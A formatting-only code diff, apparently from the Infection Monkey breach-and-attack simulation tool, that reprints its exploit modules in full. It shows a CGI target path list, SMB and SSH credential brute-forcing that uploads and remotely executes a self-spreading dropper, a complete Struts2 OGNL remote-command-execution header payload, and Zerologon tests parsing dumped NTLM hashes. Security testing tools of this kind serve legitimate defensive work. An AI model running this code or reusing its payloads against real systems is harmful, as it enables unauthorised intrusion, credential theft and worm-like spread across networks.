||||||
r'/CSNews.cgi',
|
r"/CSNews.cgi",
|
||||||
r'/csPassword.cgi',
|
r"/csPassword.cgi",
|
||||||
r'/dcadmin.cgi',
|
r"/dcadmin.cgi",
|
||||||
r'/dcboard.cgi',
|
r"/dcboard.cgi",
|
||||||
r'/dcforum.cgi',
|
r"/dcforum.cgi",
|
||||||
r'/dcforum/dcforum.cgi',
|
r"/dcforum/dcforum.cgi",
|
||||||
r'/debuff.cgi',
|
r"/debuff.cgi",
|
||||||
r'/debug.cgi',
|
r"/debug.cgi",
|
||||||
r'/details.cgi',
|
r"/details.cgi",
|
||||||
r'/edittag/edittag.cgi',
|
r"/edittag/edittag.cgi",
|
||||||
r'/emumail.cgi',
|
r"/emumail.cgi",
|
||||||
r'/enter_buff.cgi',
|
r"/enter_buff.cgi",
|
||||||
r'/enter_bug.cgi',
|
r"/enter_bug.cgi",
|
||||||
r'/ez2000/ezadmin.cgi',
|
r"/ez2000/ezadmin.cgi",
|
||||||
r'/ez2000/ezboard.cgi',
|
r"/ez2000/ezboard.cgi",
|
||||||
r'/ez2000/ezman.cgi',
|
r"/ez2000/ezman.cgi",
|
||||||
r'/fcgi-bin/echo',
|
r"/fcgi-bin/echo",
|
||||||
r'/fcgi-bin/echo',
|
r"/fcgi-bin/echo",
|
||||||
r'/fcgi-bin/echo2',
|
r"/fcgi-bin/echo2",
|
||||||
r'/fcgi-bin/echo2',
|
r"/fcgi-bin/echo2",
|
||||||
r'/Gozila.cgi',
|
r"/Gozila.cgi",
|
||||||
r'/hitmatic/analyse.cgi',
|
r"/hitmatic/analyse.cgi",
|
||||||
r'/hp_docs/cgi-bin/index.cgi',
|
r"/hp_docs/cgi-bin/index.cgi",
|
||||||
r'/html/cgi-bin/cgicso',
|
r"/html/cgi-bin/cgicso",
|
||||||
r'/html/cgi-bin/cgicso',
|
r"/html/cgi-bin/cgicso",
|
||||||
r'/index.cgi',
|
r"/index.cgi",
|
||||||
r'/info.cgi',
|
r"/info.cgi",
|
||||||
r'/infosrch.cgi',
|
r"/infosrch.cgi",
|
||||||
r'/login.cgi',
|
r"/login.cgi",
|
||||||
r'/mailview.cgi',
|
r"/mailview.cgi",
|
||||||
r'/main.cgi',
|
r"/main.cgi",
|
||||||
r'/megabook/admin.cgi',
|
r"/megabook/admin.cgi",
|
||||||
r'/ministats/admin.cgi',
|
r"/ministats/admin.cgi",
|
||||||
r'/mods/apage/apage.cgi',
|
r"/mods/apage/apage.cgi",
|
||||||
r'/_mt/mt.cgi',
|
r"/_mt/mt.cgi",
|
||||||
r'/musicqueue.cgi',
|
r"/musicqueue.cgi",
|
||||||
r'/ncbook.cgi',
|
r"/ncbook.cgi",
|
||||||
r'/newpro.cgi',
|
r"/newpro.cgi",
|
||||||
r'/newsletter.sh',
|
r"/newsletter.sh",
|
||||||
r'/oem_webstage/cgi-bin/oemapp_cgi',
|
r"/oem_webstage/cgi-bin/oemapp_cgi",
|
||||||
r'/page.cgi',
|
r"/page.cgi",
|
||||||
r'/parse_xml.cgi',
|
r"/parse_xml.cgi",
|
||||||
r'/photodata/manage.cgi',
|
r"/photodata/manage.cgi",
|
||||||
r'/photo/manage.cgi',
|
r"/photo/manage.cgi",
|
||||||
r'/print.cgi',
|
r"/print.cgi",
|
||||||
r'/process_buff.cgi',
|
r"/process_buff.cgi",
|
||||||
r'/process_bug.cgi',
|
r"/process_bug.cgi",
|
||||||
r'/pub/english.cgi',
|
r"/pub/english.cgi",
|
||||||
r'/quikmail/nph-emumail.cgi',
|
r"/quikmail/nph-emumail.cgi",
|
||||||
r'/quikstore.cgi',
|
r"/quikstore.cgi",
|
||||||
r'/reviews/newpro.cgi',
|
r"/reviews/newpro.cgi",
|
||||||
r'/ROADS/cgi-bin/search.pl',
|
r"/ROADS/cgi-bin/search.pl",
|
||||||
r'/sample01.cgi',
|
r"/sample01.cgi",
|
||||||
r'/sample02.cgi',
|
r"/sample02.cgi",
|
||||||
r'/sample03.cgi',
|
r"/sample03.cgi",
|
||||||
r'/sample04.cgi',
|
r"/sample04.cgi",
|
||||||
r'/sampleposteddata.cgi',
|
r"/sampleposteddata.cgi",
|
||||||
r'/scancfg.cgi',
|
r"/scancfg.cgi",
|
||||||
r'/scancfg.cgi',
|
r"/scancfg.cgi",
|
||||||
r'/servers/link.cgi',
|
r"/servers/link.cgi",
|
||||||
r'/setpasswd.cgi',
|
r"/setpasswd.cgi",
|
||||||
r'/SetSecurity.shm',
|
r"/SetSecurity.shm",
|
||||||
r'/shop/member_html.cgi',
|
r"/shop/member_html.cgi",
|
||||||
r'/shop/normal_html.cgi',
|
r"/shop/normal_html.cgi",
|
||||||
r'/site_searcher.cgi',
|
r"/site_searcher.cgi",
|
||||||
r'/siteUserMod.cgi',
|
r"/siteUserMod.cgi",
|
||||||
r'/submit.cgi',
|
r"/submit.cgi",
|
||||||
r'/technote/print.cgi',
|
r"/technote/print.cgi",
|
||||||
r'/template.cgi',
|
r"/template.cgi",
|
||||||
r'/test.cgi',
|
r"/test.cgi",
|
||||||
r'/ucsm/isSamInstalled.cgi',
|
r"/ucsm/isSamInstalled.cgi",
|
||||||
r'/upload.cgi',
|
r"/upload.cgi",
|
||||||
r'/userreg.cgi',
|
r"/userreg.cgi",
|
||||||
r'/users/scripts/submit.cgi',
|
r"/users/scripts/submit.cgi",
|
||||||
r'/vood/cgi-bin/vood_view.cgi',
|
r"/vood/cgi-bin/vood_view.cgi",
|
||||||
r'/Web_Store/web_store.cgi',
|
r"/Web_Store/web_store.cgi",
|
||||||
r'/webtools/bonsai/ccvsblame.cgi',
|
r"/webtools/bonsai/ccvsblame.cgi",
|
||||||
r'/webtools/bonsai/cvsblame.cgi',
|
r"/webtools/bonsai/cvsblame.cgi",
|
||||||
r'/webtools/bonsai/cvslog.cgi',
|
r"/webtools/bonsai/cvslog.cgi",
|
||||||
r'/webtools/bonsai/cvsquery.cgi',
|
r"/webtools/bonsai/cvsquery.cgi",
|
||||||
r'/webtools/bonsai/cvsqueryform.cgi',
|
r"/webtools/bonsai/cvsqueryform.cgi",
|
||||||
r'/webtools/bonsai/showcheckins.cgi',
|
r"/webtools/bonsai/showcheckins.cgi",
|
||||||
r'/wwwadmin.cgi',
|
r"/wwwadmin.cgi",
|
||||||
r'/wwwboard.cgi',
|
r"/wwwboard.cgi",
|
||||||
r'/wwwboard/wwwboard.cgi'
|
r"/wwwboard/wwwboard.cgi",
|
||||||
)
|
)
|
||||||
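Everything in the hunk above is mechanical black output: string quotes are normalized to double quotes, and the pre-existing trailing comma ("magic trailing comma") keeps the tuple exploded one path per line. A minimal sketch of the same transformation, assuming black==20.8b1 is installed; the PATHS name and its two entries are illustrative stand-ins, not code from this commit:

# Minimal sketch, assuming black==20.8b1; PATHS is a made-up name.
import black

src = "PATHS = (r'/cgi-bin/zml.cgi', r'/cgi-mod/index.cgi',)\n"
print(black.format_str(src, mode=black.FileMode(line_length=100)))
# PATHS = (
#     r"/cgi-bin/zml.cgi",
#     r"/cgi-mod/index.cgi",
# )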

@@ -5,10 +5,13 @@ from impacket.dcerpc.v5 import scmr, transport
 from common.utils.attack_utils import ScanStatus, UsageEnum
 from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
+from infection_monkey.exploit.tools.helpers import (
+    build_monkey_commandline,
+    get_monkey_depth,
+    get_target_monkey,
+)
 from infection_monkey.exploit.tools.smb_tools import SmbTools
-from infection_monkey.model import (DROPPER_CMDLINE_DETACHED_WINDOWS,
-                                    MONKEY_CMDLINE_DETACHED_WINDOWS)
+from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS
 from infection_monkey.network.smbfinger import SMBFinger
 from infection_monkey.network.tools import check_tcp_port
 from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
@@ -17,12 +20,12 @@ LOG = getLogger(__name__)


 class SmbExploiter(HostExploiter):
-    _TARGET_OS_TYPE = ['windows']
+    _TARGET_OS_TYPE = ["windows"]
     EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
-    _EXPLOITED_SERVICE = 'SMB'
+    _EXPLOITED_SERVICE = "SMB"
     KNOWN_PROTOCOLS = {
-        '139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
-        '445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
+        "139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
+        "445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
     }
     USE_KERBEROS = False

@@ -34,7 +37,7 @@ class SmbExploiter(HostExploiter):
         if super(SmbExploiter, self).is_os_supported():
             return True

-        if not self.host.os.get('type'):
+        if not self.host.os.get("type"):
             is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
             if is_smb_open:
                 smb_finger = SMBFinger()
@@ -42,8 +45,8 @@ class SmbExploiter(HostExploiter):
             else:
                 is_nb_open, _ = check_tcp_port(self.host.ip_addr, 139)
                 if is_nb_open:
-                    self.host.os['type'] = 'windows'
-            return self.host.os.get('type') in self._TARGET_OS_TYPE
+                    self.host.os["type"] = "windows"
+            return self.host.os.get("type") in self._TARGET_OS_TYPE
         return False

     def _exploit_host(self):
@@ -59,25 +62,34 @@ class SmbExploiter(HostExploiter):
         for user, password, lm_hash, ntlm_hash in creds:
             try:
                 # copy the file remotely using SMB
-                remote_full_path = SmbTools.copy_file(self.host,
-                                                      src_path,
-                                                      self._config.dropper_target_path_win_32,
-                                                      user,
-                                                      password,
-                                                      lm_hash,
-                                                      ntlm_hash,
-                                                      self._config.smb_download_timeout)
+                remote_full_path = SmbTools.copy_file(
+                    self.host,
+                    src_path,
+                    self._config.dropper_target_path_win_32,
+                    user,
+                    password,
+                    lm_hash,
+                    ntlm_hash,
+                    self._config.smb_download_timeout,
+                )

                 if remote_full_path is not None:
-                    LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
-                              self.host,
-                              user,
-                              self._config.hash_sensitive_data(password),
-                              self._config.hash_sensitive_data(lm_hash),
-                              self._config.hash_sensitive_data(ntlm_hash))
+                    LOG.debug(
+                        "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
+                        self.host,
+                        user,
+                        self._config.hash_sensitive_data(password),
+                        self._config.hash_sensitive_data(lm_hash),
+                        self._config.hash_sensitive_data(ntlm_hash),
+                    )
                     self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
-                    self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
-                                                     SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
+                    self.add_vuln_port(
+                        "%s or %s"
+                        % (
+                            SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
+                            SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
+                        )
+                    )
                     exploited = True
                     break
                 else:
@@ -93,7 +105,8 @@ class SmbExploiter(HostExploiter):
                     self._config.hash_sensitive_data(password),
                     self._config.hash_sensitive_data(lm_hash),
                     self._config.hash_sensitive_data(ntlm_hash),
-                    exc)
+                    exc,
+                )
                 continue

         if not exploited:
@@ -103,24 +116,29 @@ class SmbExploiter(HostExploiter):
         self.set_vulnerable_port()
         # execute the remote dropper in case the path isn't final
         if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
-            cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
-                      build_monkey_commandline(self.host, get_monkey_depth() - 1,
-                                               self.vulnerable_port,
-                                               self._config.dropper_target_path_win_32)
+            cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
+                "dropper_path": remote_full_path
+            } + build_monkey_commandline(
+                self.host,
+                get_monkey_depth() - 1,
+                self.vulnerable_port,
+                self._config.dropper_target_path_win_32,
+            )
         else:
-            cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
-                      build_monkey_commandline(self.host,
-                                               get_monkey_depth() - 1,
-                                               vulnerable_port=self.vulnerable_port)
+            cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
+                "monkey_path": remote_full_path
+            } + build_monkey_commandline(
+                self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
+            )

         smb_conn = False
         for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
             rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
             rpctransport.set_dport(port)
             rpctransport.setRemoteHost(self.host.ip_addr)
-            if hasattr(rpctransport, 'set_credentials'):
+            if hasattr(rpctransport, "set_credentials"):
                 # This method exists only for selected protocol sequences.
-                rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
+                rpctransport.set_credentials(user, password, "", lm_hash, ntlm_hash, None)
             rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)

             scmr_rpc = rpctransport.get_dce_rpc()
@@ -128,7 +146,12 @@ class SmbExploiter(HostExploiter):
             try:
                 scmr_rpc.connect()
             except Exception as exc:
-                LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc)
+                LOG.debug(
+                    "Can't connect to SCM on exploited machine %r port %s : %s",
+                    self.host,
+                    port,
+                    exc,
+                )
                 continue

             smb_conn = rpctransport.get_smb_connection()
@@ -140,12 +163,17 @@ class SmbExploiter(HostExploiter):
             smb_conn.setTimeout(100000)
             scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
             resp = scmr.hROpenSCManagerW(scmr_rpc)
-            sc_handle = resp['lpScHandle']
+            sc_handle = resp["lpScHandle"]

             # start the monkey using the SCM
-            resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
-                                         lpBinaryPathName=cmdline)
-            service = resp['lpServiceHandle']
+            resp = scmr.hRCreateServiceW(
+                scmr_rpc,
+                sc_handle,
+                self._config.smb_service_name,
+                self._config.smb_service_name,
+                lpBinaryPathName=cmdline,
+            )
+            service = resp["lpServiceHandle"]
             try:
                 scmr.hRStartServiceW(scmr_rpc, service)
                 status = ScanStatus.USED
@@ -156,17 +184,26 @@ class SmbExploiter(HostExploiter):
             scmr.hRDeleteService(scmr_rpc, service)
             scmr.hRCloseServiceHandle(scmr_rpc, service)

-            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                     remote_full_path, self.host, cmdline)
+            LOG.info(
+                "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+                remote_full_path,
+                self.host,
+                cmdline,
+            )

-            self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
-                                             SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
+            self.add_vuln_port(
+                "%s or %s"
+                % (
+                    SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
+                    SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
+                )
+            )
             return True

     def set_vulnerable_port(self):
-        if 'tcp-445' in self.host.services:
+        if "tcp-445" in self.host.services:
             self.vulnerable_port = "445"
-        elif 'tcp-139' in self.host.services:
+        elif "tcp-139" in self.host.services:
             self.vulnerable_port = "139"
         else:
             self.vulnerable_port = None
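For readers following the SmbExploiter hunks, this is the impacket call sequence they reformat, pulled out as a standalone sketch. The address and credentials are placeholders, and this is an illustration rather than code from the commit:

# Hedged sketch only; host and credentials are placeholder values. The calls
# mirror the diff above: bind to the remote Service Control Manager over the
# SMB \pipe\svcctl named pipe, then open an SCM handle.
from impacket.dcerpc.v5 import scmr, transport

rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:10.0.0.5[\pipe\svcctl]")
rpctransport.set_dport(445)
rpctransport.setRemoteHost("10.0.0.5")
if hasattr(rpctransport, "set_credentials"):
    # empty strings: no domain and no LM/NT hashes; None: no AES key
    rpctransport.set_credentials("user", "password", "", "", "", None)

scmr_rpc = rpctransport.get_dce_rpc()
scmr_rpc.connect()
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
sc_handle = scmr.hROpenSCManagerW(scmr_rpc)["lpScHandle"]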

@@ -9,13 +9,17 @@ from common.utils.attack_utils import ScanStatus
 from common.utils.exceptions import FailedExploitationError
 from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit.HostExploiter import HostExploiter
-from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
+from infection_monkey.exploit.tools.helpers import (
+    build_monkey_commandline,
+    get_monkey_depth,
+    get_target_monkey,
+)
 from infection_monkey.model import MONKEY_ARG
 from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
 from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
 from infection_monkey.telemetry.attack.t1222_telem import T1222Telem

-__author__ = 'hoffer'
+__author__ = "hoffer"

 LOG = logging.getLogger(__name__)
 SSH_PORT = 22
@@ -23,9 +27,9 @@ TRANSFER_UPDATE_RATE = 15


 class SSHExploiter(HostExploiter):
-    _TARGET_OS_TYPE = ['linux', None]
+    _TARGET_OS_TYPE = ["linux", None]
     EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
-    _EXPLOITED_SERVICE = 'SSH'
+    _EXPLOITED_SERVICE = "SSH"

     def __init__(self, host):
         super(SSHExploiter, self).__init__(host)
@@ -42,29 +46,27 @@ class SSHExploiter(HostExploiter):

         for user, ssh_key_pair in user_ssh_key_pairs:
             # Creating file-like private key for paramiko
-            pkey = io.StringIO(ssh_key_pair['private_key'])
-            ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
+            pkey = io.StringIO(ssh_key_pair["private_key"])
+            ssh_string = "%s@%s" % (ssh_key_pair["user"], ssh_key_pair["ip"])

             ssh = paramiko.SSHClient()
             ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
             try:
                 pkey = paramiko.RSAKey.from_private_key(pkey)
-            except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
+            except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
                 LOG.error("Failed reading ssh key")
             try:
-                ssh.connect(self.host.ip_addr,
-                            username=user,
-                            pkey=pkey,
-                            port=port)
-                LOG.debug("Successfully logged in %s using %s users private key",
-                          self.host, ssh_string)
+                ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
+                LOG.debug(
+                    "Successfully logged in %s using %s users private key", self.host, ssh_string
+                )
                 self.report_login_attempt(True, user, ssh_key=ssh_string)
                 return ssh
             except Exception:
                 ssh.close()
-                LOG.debug("Error logging into victim %r with %s"
-                          " private key", self.host,
-                          ssh_string)
+                LOG.debug(
+                    "Error logging into victim %r with %s" " private key", self.host, ssh_string
+                )
                 self.report_login_attempt(False, user, ssh_key=ssh_string)
                 continue
         raise FailedExploitationError
@@ -77,21 +79,27 @@ class SSHExploiter(HostExploiter):
             ssh = paramiko.SSHClient()
             ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
             try:
-                ssh.connect(self.host.ip_addr,
-                            username=user,
-                            password=current_password,
-                            port=port)
+                ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port)

-                LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
-                          self.host, user, self._config.hash_sensitive_data(current_password))
+                LOG.debug(
+                    "Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
+                    self.host,
+                    user,
+                    self._config.hash_sensitive_data(current_password),
+                )
                 self.add_vuln_port(port)
                 self.report_login_attempt(True, user, current_password)
                 return ssh

             except Exception as exc:
-                LOG.debug("Error logging into victim %r with user"
-                          " %s and password (SHA-512) '%s': (%s)", self.host,
-                          user, self._config.hash_sensitive_data(current_password), exc)
+                LOG.debug(
+                    "Error logging into victim %r with user"
+                    " %s and password (SHA-512) '%s': (%s)",
+                    self.host,
+                    user,
+                    self._config.hash_sensitive_data(current_password),
+                    exc,
+                )
                 self.report_login_attempt(False, user, current_password)
                 ssh.close()
                 continue
@@ -102,8 +110,8 @@ class SSHExploiter(HostExploiter):
         port = SSH_PORT
         # if ssh banner found on different port, use that port.
         for servkey, servdata in list(self.host.services.items()):
-            if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
-                port = int(servkey.replace('tcp-', ''))
+            if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
+                port = int(servkey.replace("tcp-", ""))

         is_open, _ = check_tcp_port(self.host.ip_addr, port)
         if not is_open:
@@ -119,12 +127,12 @@ class SSHExploiter(HostExploiter):
             LOG.debug("Exploiter SSHExploiter is giving up...")
             return False

-        if not self.host.os.get('type'):
+        if not self.host.os.get("type"):
             try:
-                _, stdout, _ = ssh.exec_command('uname -o')
+                _, stdout, _ = ssh.exec_command("uname -o")
                 uname_os = stdout.read().lower().strip().decode()
-                if 'linux' in uname_os:
-                    self.host.os['type'] = 'linux'
+                if "linux" in uname_os:
+                    self.host.os["type"] = "linux"
                 else:
                     LOG.info("SSH Skipping unknown os: %s", uname_os)
                     return False
@@ -132,21 +140,25 @@ class SSHExploiter(HostExploiter):
                 LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
                 return False

-        if not self.host.os.get('machine'):
+        if not self.host.os.get("machine"):
             try:
-                _, stdout, _ = ssh.exec_command('uname -m')
+                _, stdout, _ = ssh.exec_command("uname -m")
                 uname_machine = stdout.read().lower().strip().decode()
-                if '' != uname_machine:
-                    self.host.os['machine'] = uname_machine
+                if "" != uname_machine:
+                    self.host.os["machine"] = uname_machine
             except Exception as exc:
                 LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc)

         if self.skip_exist:
-            _, stdout, stderr = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux)
+            _, stdout, stderr = ssh.exec_command(
+                "head -c 1 %s" % self._config.dropper_target_path_linux
+            )
             stdout_res = stdout.read().strip()
             if stdout_res:
                 # file exists
-                LOG.info("Host %s was already infected under the current configuration, done" % self.host)
+                LOG.info(
+                    "Host %s was already infected under the current configuration, done" % self.host
+                )
                 return True  # return already infected

         src_path = get_target_monkey(self.host)
@@ -160,33 +172,44 @@ class SSHExploiter(HostExploiter):

             self._update_timestamp = time.time()
             with monkeyfs.open(src_path) as file_obj:
-                ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path),
-                          callback=self.log_transfer)
+                ftp.putfo(
+                    file_obj,
+                    self._config.dropper_target_path_linux,
+                    file_size=monkeyfs.getsize(src_path),
+                    callback=self.log_transfer,
+                )
             ftp.chmod(self._config.dropper_target_path_linux, 0o777)
             status = ScanStatus.USED
-            T1222Telem(ScanStatus.USED, "chmod 0777 %s" % self._config.dropper_target_path_linux, self.host).send()
+            T1222Telem(
+                ScanStatus.USED,
+                "chmod 0777 %s" % self._config.dropper_target_path_linux,
+                self.host,
+            ).send()
             ftp.close()
         except Exception as exc:
             LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc)
             status = ScanStatus.SCANNED

-        T1105Telem(status,
-                   get_interface_to_target(self.host.ip_addr),
-                   self.host.ip_addr,
-                   src_path).send()
+        T1105Telem(
+            status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path
+        ).send()
         if status == ScanStatus.SCANNED:
             return False

         try:
             cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
-            cmdline += build_monkey_commandline(self.host,
-                                                get_monkey_depth() - 1,
-                                                vulnerable_port=SSH_PORT)
+            cmdline += build_monkey_commandline(
+                self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT
+            )
             cmdline += " > /dev/null 2>&1 &"
             ssh.exec_command(cmdline)

-            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                     self._config.dropper_target_path_linux, self.host, cmdline)
+            LOG.info(
+                "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+                self._config.dropper_target_path_linux,
+                self.host,
+                cmdline,
+            )

             ssh.close()
             self.add_executed_cmd(cmdline)
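As a companion to the SSHExploiter hunks, the paramiko flow they touch looks like this in isolation. The address and credentials are placeholder values; this is a sketch, not the module itself:

# Hedged sketch only; host and credentials are placeholders. Mirrors the
# connect / exec_command pattern reformatted in the hunks above.
import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
ssh.connect("10.0.0.6", username="user", password="password", port=22)

# fingerprint the OS the same way the exploiter does
_, stdout, _ = ssh.exec_command("uname -o")
print(stdout.read().lower().strip().decode())
ssh.close()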

@@ -21,15 +21,15 @@ DOWNLOAD_TIMEOUT = 300


 class Struts2Exploiter(WebRCE):
-    _TARGET_OS_TYPE = ['linux', 'windows']
-    _EXPLOITED_SERVICE = 'Struts2'
+    _TARGET_OS_TYPE = ["linux", "windows"]
+    _EXPLOITED_SERVICE = "Struts2"

     def __init__(self, host):
         super(Struts2Exploiter, self).__init__(host, None)

     def get_exploit_config(self):
         exploit_config = super(Struts2Exploiter, self).get_exploit_config()
-        exploit_config['dropper'] = True
+        exploit_config["dropper"] = True
         return exploit_config

     def build_potential_urls(self, ports, extensions=None):
@@ -47,10 +47,12 @@ class Struts2Exploiter(WebRCE):
     @staticmethod
     def get_redirected(url):
         # Returns false if url is not right
-        headers = {'User-Agent': 'Mozilla/5.0'}
+        headers = {"User-Agent": "Mozilla/5.0"}
         request = urllib.request.Request(url, headers=headers)
         try:
-            return urllib.request.urlopen(request, context=ssl._create_unverified_context()).geturl()
+            return urllib.request.urlopen(
+                request, context=ssl._create_unverified_context()
+            ).geturl()
         except urllib.error.URLError:
             LOG.error("Can't reach struts2 server")
             return False
@@ -63,24 +65,26 @@ class Struts2Exploiter(WebRCE):
         """
         cmd = re.sub(r"\\", r"\\\\", cmd)
         cmd = re.sub(r"'", r"\\'", cmd)
-        payload = "%%{(#_='multipart/form-data')." \
-                  "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
-                  "(#_memberAccess?" \
-                  "(#_memberAccess=#dm):" \
-                  "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \
-                  "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \
-                  "(#ognlUtil.getExcludedPackageNames().clear())." \
-                  "(#ognlUtil.getExcludedClasses().clear())." \
-                  "(#context.setMemberAccess(#dm))))." \
-                  "(#cmd='%s')." \
-                  "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \
-                  "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \
-                  "(#p=new java.lang.ProcessBuilder(#cmds))." \
-                  "(#p.redirectErrorStream(true)).(#process=#p.start())." \
-                  "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
-                  "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
-                  "(#ros.flush())}" % cmd
-        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
+        payload = (
+            "%%{(#_='multipart/form-data')."
+            "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+            "(#_memberAccess?"
+            "(#_memberAccess=#dm):"
+            "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+            "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+            "(#ognlUtil.getExcludedPackageNames().clear())."
+            "(#ognlUtil.getExcludedClasses().clear())."
+            "(#context.setMemberAccess(#dm))))."
+            "(#cmd='%s')."
+            "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+            "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+            "(#p=new java.lang.ProcessBuilder(#cmds))."
+            "(#p.redirectErrorStream(true)).(#process=#p.start())."
+            "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+            "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+            "(#ros.flush())}" % cmd
+        )
+        headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
         try:
             request = urllib.request.Request(url, headers=headers)
             # Timeout added or else we would wait for all monkeys' output
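The get_redirected() hunk above boils down to this urllib pattern: send a request with a browser-ish User-Agent, skip TLS verification, and read back the post-redirect URL. A sketch only; the target URL is a placeholder:

# Hedged sketch only; the URL is a placeholder, not a value from this diff.
import ssl
import urllib.error
import urllib.request

headers = {"User-Agent": "Mozilla/5.0"}
request = urllib.request.Request("http://10.0.0.7:8080/struts2-showcase/", headers=headers)
try:
    final_url = urllib.request.urlopen(
        request, context=ssl._create_unverified_context()
    ).geturl()
except urllib.error.URLError:
    final_url = None  # the exploiter logs "Can't reach struts2 server" and returns False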

@@ -28,9 +28,7 @@ def zerologon_exploiter_object(monkeypatch):


 def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
     dummy_exploit_attempt_result = {"ErrorCode": 0}
-    assert zerologon_exploiter_object.assess_exploit_attempt_result(
-        dummy_exploit_attempt_result
-    )
+    assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)


 def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
@@ -56,8 +54,7 @@ def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_obje

 def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
     mock_dumped_secrets = [
-        f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::"
-        for i in range(len(USERS))
+        f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
     ]
     expected_extracted_creds = {
         USERS[0]: {
